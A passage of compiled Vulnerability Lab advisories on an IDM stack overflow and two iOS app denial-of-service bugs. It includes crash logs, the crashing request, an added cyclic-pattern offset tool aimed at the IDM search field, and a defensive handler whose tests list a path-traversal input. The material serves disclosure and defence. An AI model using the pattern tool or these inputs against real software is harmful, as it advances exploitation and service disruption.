2. Open the settings and setup a pin to protect
3. Move to the local web-server via wifi and start it
4. Upload some files for the index dir listing to preview
5. Close the app and open it back by restart
Note: Now the pin should appear
6. Push a folder path or file that becomes visible and hold it
7. Push home again
8. Way free to edit and preview the files
9. Successful reproduction of the local vulnerability!


Security Risk:
==
The security risk of the information disclosure vulnerability in the
web-application is estimated as high.


Credits & Authors:
==
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com   www.vuln-lab.com
            www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
            paste.vulnerability-db.com  infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab   facebook.com/VulnerabilityLab
            youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php

[FD] Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities

2020-04-28 Thread Vulnerability Lab
Document Title:
===
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2236


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):

2236


Common Vulnerability Scoring System:

7.1


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Internet Download Manager Corp. is a subsidiary of Tonec Inc. that
develops Internet Applications since 1990.
We have strong expertise in network programming, consulting and design
services. Our company started Internet
Download Manager project in 1998 when we where developing network
libraries and console applications for
accelerated files downloading.

(Copy of the Homepage:
https://www.internetdownloadmanager.com/support/about_us.html )
(Software Product: https://www.internetdownloadmanager.com/download.html)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered stack
buffer overflow vulnerabilities in the Internet Download Manager
v6.37.11.1 software.


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Local


Severity Level:
===
High


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

Multiple stack buffer overflow vulnerabilities have been discovered in
the official Internet Download Manager v6.37.11.1 software.
The buffer overflow allows overwriting registers of the process to
compromise the file-system by elevating local process privileges.

1.1
The first stack buffer overflow is located in the `search` function of
the downloads menu. The search function itself does not use
any secure restriction on the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. This allows a local
attacker to compromise the local computer or file-system.

1.2
The second stack buffer overflow is located in the `Export/Import`
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.

The security risk of the local stack buffer overflow vulnerabilities in
the software are estimated as high with a cvss count of 7.1.
Exploitation of the buffer overflow vulnerability requires a low
privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in overwrite of the
active registers to compromise of the computer system or process.

Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)


Proof of Concept (PoC):
===
1.1
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashes with several uncaught exceptions because of an
overwritten register (0168D8F0)
5. Successful reproduction of the local buffer overflow vulnerability!


--- Debug Logs (0168D8F0) ---
00d61850 668b08  mov cx,word ptr [eax]ds:002b:41414141
-
00D6186D  |. 56 PUSH ESI ; /Arg1
-
00D61882  |. E8 59FFCALL IDMan.00D617E0  ;
IDMan.00D617E0
-
00D6189B  |> 50 PUSH EAX ; /Arg1
-
00D6189E  |. E8 3DFFCALL IDMan.00D617E0  ;
IDMan.00D617E0
-
Call stack
 Address=0168C79C
 Stack=00DFE0F2
 Procedure / arguments=IDMan.00D617E0
 Called from=IDMan.00DFE0ED
 Frame=0168E02C
-
SEH chain
AddressSE handler
0168C790   IDMan.00F751E8
0168D8F0   41414141
-
EAX 41414141
ECX 0168
EDX 41414141
EBX 0001
ESP 0168C76C
EBP 0168E02C UNICODE "AA..."
ESI 0168C7AC UNICODE "AA..."
EDI 
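The dump above shows EAX, EDX and the SEH handler at 0168D8F0 all reading 41414141, which proves the search input reached them but not which bytes of it did. The usual next step is to replace the run of "A"s with a cyclic pattern (the same scheme as Metasploit's pattern_create / pattern_offset) and look each crash value up, remembering that x86 stores it little-endian. The following is an added example, not Vulnerability Lab's test data or IDM code: a pattern generator, an offset lookup, and a register-dump parser that reports which registers hold a slice of the pattern. The register dump in it is constructed; only its layout follows the debugger output above.

```python
"""From "AAAA" to an offset: mapping a crash value back into the input.
Added example; SAMPLE_DUMP is constructed, not taken from the advisory."""
from __future__ import annotations

import itertools
import string

PATTERN_MAX = 26 * 26 * 10 * 3          # 20280 bytes before the pattern repeats
REGISTERS = {"EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "EBP", "ESP", "EIP"}

# Constructed dump in the same layout as the advisory's register block.
SAMPLE_DUMP = """\
EAX 41306141
ECX 0168C7AC
EDX 62413961
EBX 00000001
ESP 0168C76C
EBP 30624139
"""


def cyclic_pattern(length: int = PATTERN_MAX) -> str:
    """Upper, lower, digit triples (Aa0Aa1...Ab0...); no 4-byte slice repeats
    within the first PATTERN_MAX bytes."""
    out: list[str] = []
    for up, low, dig in itertools.product(string.ascii_uppercase,
                                          string.ascii_lowercase, string.digits):
        out.append(up + low + dig)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def crash_value_to_needle(value: int | str) -> str:
    """Turn a register value into the 4 characters that produced it.  Accepts
    an int, an 8-hex-digit string as printed by the debugger, or the literal
    characters; ints and hex strings are byte-swapped (little-endian)."""
    if isinstance(value, str):
        value = value.strip()
        if len(value) == 8 and all(c in string.hexdigits for c in value):
            value = int(value, 16)
        else:
            return value
    return value.to_bytes(4, "little").decode("latin-1")


def pattern_offset(value: int | str, length: int = PATTERN_MAX) -> int:
    """Offset of the crash value inside the pattern, or -1 if it is not there
    (which is what a plain "AAAA" overwrite gives: no information)."""
    return cyclic_pattern(length).find(crash_value_to_needle(value))


def parse_registers(dump: str) -> dict[str, int]:
    regs: dict[str, int] = {}
    for line in dump.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[0] in REGISTERS:
            try:
                regs[parts[0]] = int(parts[1], 16)
            except ValueError:
                continue                 # truncated or non-hex value, skip it
    return regs


def controlled_registers(dump: str) -> dict[str, int]:
    """Registers holding a slice of the pattern, with the input offset for each."""
    pattern = cyclic_pattern()
    found: dict[str, int] = {}
    for reg, val in parse_registers(dump).items():
        off = pattern.find(crash_value_to_needle(val))
        if off >= 0:
            found[reg] = off
    return found


if __name__ == "__main__":
    payload = cyclic_pattern(5000)     # paste into the search field or an .ef2 URL/referer line
    print(payload[:24], "...")
    print("plain AAAA overwrite ->", pattern_offset(0x41414141))
    print(controlled_registers(SAMPLE_DUMP))
```

The SEH handler address from the chain is looked up the same way as a register. One caveat for this target: the advisory says the search field was fed a large unicode payload, and if the application stores the input as UTF-16 every pattern character arrives as two bytes, so a register holds only two pattern characters and the offset is no longer unique; the pattern then has to be narrowed by hand.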

[FD] File Sharing & Chat v1.0 iOS - Denial of Service Vulnerability

2020-04-28 Thread Vulnerability Lab
Document Title:
===
File Sharing & Chat v1.0 iOS - Denial of Service Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=


Release Date:
=
2020-04-27


Vulnerability Laboratory ID (VL-ID):




Common Vulnerability Scoring System:

4


Vulnerability Class:

Denial of Service


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
WiFi File Transfer is easiest and quickest file sharing application,
supporting multiple files sharing with multiple devices simultaneously.
WiFi File Transfer Application provides solution for the iPhone users
who want to connect their mobile with PC without connecting a data cable
or wire. WiFi File Sharing App provides the connectivity of mobile
device with PC through Wi-Fi. User can copy, paste, and delete files from
phone by connecting it with Computer. App also supports transfer between
one iPhone to another iPhone.

(Copy of the Homepage:
https://apps.apple.com/us/app/file-sharing-chat-connect-transfer-easy-file-sharing/id1137340773
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote
denial of service vulnerability in the


Affected Product(s):

Sandeep Bhandari
File Sharing & Chat v1.0 - Apple iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==
2020-04-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A denial of service web vulnerability has been discovered in the
official mobile iOS web-application.
The vulnerability allows remote attackers to crash or freeze the
application process or its components.

Attackers are able to transmit specially crafted chat messages to trigger
a validation error that is able
to crash the mobile iOS application process. The error occurs due to the
transmission of the message body content.
On delivery, all clients connected to the chat crash at the same
time.


Proof of Concept (PoC):
===
The denial of service vulnerability can be exploited by remote attackers
without user interaction or privileged user accounts.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the web-application
2. Open the chat module at the bottom of the app index
3. Insert the payload and transmit it via "send to all users"
4. All app clients crash with an uncaught validation exception
5. Successful reproduction of the denial of service vulnerability!


PoC: Exploitation
 


Security Risk:
==
The security risk of the denial of service web vulnerability in the
mobile web-application is estimated as medium.


Credits & Authors:
==
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com   www.vuln-lab.com   www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com   paste.vulnerability-db.com   infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab   facebook.com/VulnerabilityLab   youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php

[FD] Transfer Master v3.3 iOS - Denial of Service Vulnerability

2020-04-28 Thread Vulnerability Lab
Document Title:
===
Transfer Master v3.3 iOS - Denial of Service Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2224


Release Date:
=
2020-04-28


Vulnerability Laboratory ID (VL-ID):
====================================
2224


Common Vulnerability Scoring System:
====================================
4.2


Vulnerability Class:
====================
Denial of Service


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===
Transfer Master - Transfer photo, video, file, contact and File manager.

(Copy of the Homepage:
https://apps.apple.com/us/app/transfer-master-transfer-photo-video-file-contact/id590196698
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote
denial of service vulnerability in the Transfer Master v3.3 mobile iOS
web-application.


Vulnerability Disclosure Timeline:
==
2020-04-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A remote denial of service vulnerability has been discovered in the
official Transfer Master v3.3 mobile iOS web-application.

The denial of service vulnerability is located in the delete POST method
request on the files path. Remote attackers can
manipulate the UI by sending specially crafted requests to cause a null
pointer error that crashes the wifi web-server.
The attacker changes the file delete request to a null path, which
results in a null pointer that crashes the application.

Successful exploitation of the denial of service vulnerability results
in a wifi web-server UI crash and freeze.


Proof of Concept (PoC):
===
The denial of service vulnerability can be exploited by remote attackers
with wifi network access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Install and start the local iOS app
2. Open the wifi share option to start the web-server
3. Move to the front UI
4. Tamper with the https session and replay it, deleting the files path with
(null) as an empty quote
5. The web-server crashes and the wifi UI becomes unavailable, showing a blank
screen that responds with "not found"
Note: The service is still alive but finally unavailable because of a null
pointer issue
6. Successful reproduction of the denial of service vulnerability!


--- PoC Session Logs (POST/GET) ---
http://localhost:8181/files//(null)
Host: localhost:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 28
Connection: keep-alive
_method=delete=Delete
-
POST: HTTP/1.1 302 Found
Location: /
Content-Type: text/html; charset=utf-8
Content-Length: 67
-
http://localhost:8181/
Host: localhost:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8181/
Connection: keep-alive
- (Game Over)
GET: HTTP/1.1 404 Not Found (Unavailable)
Accept-Ranges: bytes
Content-Length: 0


Credits & Authors:
==
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


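A defensive illustration of the Transfer Master advisory above, added here and not part of the advisory or of the app's own code: a file-delete handler that validates the `/files/...` path before it touches storage, so a request of the shape shown in the session log (`/files//(null)` with a `_method=delete` form body) is answered with a 400 instead of dereferencing a null path and crashing the embedded web-server. The function names (`resolve_share_path`, `handle_delete`, `demo`) and the in-memory `store` dict standing in for the phone's share folder are assumptions; the sample requests are constructed from the advisory's request shape.

```python
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, unquote

# Route prefix used by the share UI's delete form (taken from the advisory's session log).
FILES_PREFIX = "/files/"

# Constructed sample requests: the advisory's crashing shape first, then variants
# a hardened handler must also reject or handle without raising.
SAMPLE_REQUESTS = [
    ("/files//(null)", "_method=delete"),        # empty segment + "(null)" literal
    ("/files/", "_method=delete"),               # no file name at all
    ("/files/../etc/passwd", "_method=delete"),  # traversal attempt
    ("/files/photo.jpg", "_method=delete"),      # legitimate delete
    ("/files/missing.txt", "_method=delete"),    # well-formed but absent
]


def parse_form(body: str) -> Dict[str, str]:
    """Parse an application/x-www-form-urlencoded body, keeping the first value per key."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def resolve_share_path(url_path: str) -> Optional[str]:
    """Return the file name relative to the share root, or None if the path is malformed.

    Rejects: paths outside the /files/ route, an empty name, empty segments
    (the '//' from the advisory), '.' / '..' segments (also when URL-encoded),
    and control characters that native file APIs mishandle.
    """
    if not url_path.startswith(FILES_PREFIX):
        return None
    rel = unquote(url_path[len(FILES_PREFIX):])
    if rel == "":
        return None
    segments = rel.split("/")
    if any(seg in ("", ".", "..") for seg in segments):
        return None
    if any(ord(c) < 0x20 or c == "\x7f" for c in rel):
        return None
    return rel


def handle_delete(url_path: str, body: str, store: Dict[str, bytes]) -> Tuple[int, str]:
    """Handle a method-overridden delete request; never raises, always returns (status, text)."""
    form = parse_form(body)
    if form.get("_method", "").lower() != "delete":
        return 405, "method not allowed"
    rel = resolve_share_path(url_path)
    if rel is None:
        return 400, "bad file path"      # the advisory's request ends here, server stays up
    if rel not in store:
        return 404, "no such file"       # absent file is a client error, not a null deref
    del store[rel]
    return 200, f"deleted {rel}"


def demo() -> List[Tuple[str, int]]:
    """Run the constructed requests against a fresh share folder and collect the status codes."""
    store: Dict[str, bytes] = {"photo.jpg": b"\xff\xd8\xff"}  # constructed content
    return [(path, handle_delete(path, body, store)[0]) for path, body in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for path, status in demo():
        print(f"{status} {path}")
```

The point of the design is that every failure mode of the path (empty, empty segment, traversal, absent file) maps to an HTTP error code and the handler returns normally, so one bad request cannot take the share server offline for every other client on the Wi-Fi network.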